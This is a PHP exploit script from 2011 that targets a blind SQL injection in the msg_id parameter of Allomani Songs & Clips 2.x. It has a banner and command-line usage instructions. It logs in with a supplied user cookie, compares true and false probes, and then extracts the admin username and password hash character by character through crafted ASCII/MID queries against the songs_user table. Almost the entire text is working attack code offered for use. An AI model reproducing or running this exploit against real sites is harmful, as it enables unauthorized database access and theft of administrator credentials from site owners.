<?php /* =============================================================== Allomani Songs & Clips 2.x (msg_id) Blind SQL Injection Exploit =============================================================== #[+]Version : 2.x #[+]Author : ahwak2000 #[+]home : tryag.cc/cc/ ~ p0c.cc/vb/ #[+]Date : 13.08.2011 #[+]E-mail : z.u5[at]hotmail.com #[+]secript home: http://allomani.com #[+]Tested On: win xp sp3 =============================================================== */ ini_set("max_execution_time",0); print_r(' ___________________________ ________________________| Allomani 2.x eXploit 0d4y |_________________________ _ _ _ _ _ _ _ _ _____ _____ _____ _____ / _ \ | | | | | | __ | | / _ \ | |// | _ | / _ \ / _ \ / _ \ | |_| | | |_| | | | / \ | | | |_| | | \ |_| / / | | | | | | | | | | | | | | | | | _ | | |/ /\ \| | | | | | | |\ \ / /__ | |_| | | |_| | | |_| | |_| |_| |_| |_| |___/ \___| |_| |_| |_| \_\ |_____| \_____/ \_____/ \_____/ _______________________________________________________________________________ z.u5@hotmail.com '); if ($argc<5) { print_r(' ----------------------------------------------------------------------------- example: php '.$argv[0].' allomain.com /demo/ user_pass user_id ----------------------------------------------------------------------------- '); die; } function AHWAK($victim,$vic_dir,$user_pass,$user_id,$inj){ $host = $victim; $p = "http://".$host.$vic_dir; //$cookie = base64_encode(":".$inj.":"); $packet ="GET ".$p."/usercp.php?action=msg_reply&msg_id=89".$inj." HTTP/1.0\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$victim."\r\n"; $packet.="Cookie: songs_member_data_id=".$user_id."; songs_member_data_password=".md5($user_pass).";\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Connection: Close\r\n\r\n"; $o = @fsockopen($host, 80); if(!$o){ echo "\n[x] No response...\n"; die; } fputs($o, $packet); while (!feof($o)) $data .= fread($o, 1024); fclose($o); $_404 = strstr( $data, "HTTP/1.1 404 Not Found" ); if ( !empty($_404) ){ echo "\n[x] 404 Not Found... Make sure of path. \n"; die; } return $data; } function AHWAK_GET($from){ preg_match_all("(<textarea .*>(.*)</textarea>)siU", $from, $out); return $out[1][0]; } $host1 = $argv[1]; $dir1=$argv[2]; $userpass=$argv[3]; $userid=$argv[4]; if ($argc > 4) { echo "\nPlease wait...\r\n\r\n"; $login= AHWAK($host1,$dir1,$userpass,$userid,""); if(!eregi ("profile",$login)){ echo "\n\n\t[-] You have entered an invalid username or password.\n\n\n"; exit; } $truths = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"' and 1='1/*")); $falses = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"' and 1='2/*")); if ($truths == $falses) { echo "\n\t sorry: magic_quotes_gpc = On ): \n"; exit; } echo "\n\t[+] Getting Admin UserName And PassWord\n\n\t"; echo "\n\t-----------------------------------\n\n"; for ($g = 1; $g <= 16; $g++) { //eidt for ($i = 46; $i <= 122; $i++) { $qest = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"'+and+ascii(MiD((sElEct+concat_ws(0x3a,username,password)+frOm+songs_user+liMit 0,1),".$g.",1))='".$i."/*")); if ($qest == $truths) { echo chr($i); } } } echo "\n\n\t-----------------------------------\n\n\tBy Ahwak2000\n\n";